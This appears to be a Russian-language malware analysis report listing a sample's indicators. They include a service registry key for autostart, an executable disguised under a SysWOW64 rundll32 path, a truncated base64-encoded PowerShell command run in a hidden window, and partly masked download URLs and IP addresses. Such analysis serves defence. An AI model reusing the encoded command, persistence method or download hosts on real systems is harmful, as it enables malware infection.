Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\mfcm120u] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\mfcm120u] 'ImagePath' = '"%WINDIR%\SysWOW64\rundll32\mfcm120u.exe"'
- 'mfcm120u' "%WINDIR%\SysWOW64\rundll32\mfcm120u.exe"
- 'mfcm120u' %WINDIR%\SysWOW64\rundll32\mfcm120u.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AGEAaQB0AGsAdQB0AGgAZQBlAGYAPQAnAGgAdQBhAGwAdABhAHMAdABoAGkAYQBsACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAUgBpAGAAVAB5AGAAcABgAFIAbwB0AG...
- %HOMEPATH%\81.exe
- %WINDIR%\syswow64\rundll32\mfcm120u.exe
- %HOMEPATH%\81.exe в %WINDIR%\syswow64\rundll32\mfcm120u.exe
- '20#.#35.10.215':80
- http://xe#a.cz/MqjiWrT/
- http://ze###oser.com/wp-admin/LonYwsGW/
- http://ze###oser.com/cgi-sys/suspendedpage.cgi
- http://si##q.com/glpi/slliHcwAH/
- http://20#.#35.10.215/invXHl/GsUskWQPlpfR/BTsWETs/7qEuXCc6AztvmgjgTT/iA9h1oDePWBoLu/
- DNS ASK xe#a.cz
- DNS ASK ze###oser.com
- DNS ASK si##q.com
- '%HOMEPATH%\81.exe'
- '%WINDIR%\syswow64\rundll32\mfcm120u.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AGEAaQB0AGsAdQB0AGgAZQBlAGYAPQAnAGgAdQBhAGwAdABhAHMAdABoAGkAYQBsACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAUgBpAGAAVAB5AGAAcABgAFIAbwB0AG...' (со скрытым окном)